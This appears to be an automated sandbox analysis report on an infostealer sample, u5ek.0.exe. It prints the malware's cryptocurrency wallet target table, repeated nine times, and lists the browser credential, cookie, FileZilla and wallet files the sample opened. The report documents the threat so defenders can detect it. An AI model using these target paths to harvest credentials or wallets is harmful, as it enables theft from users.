Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
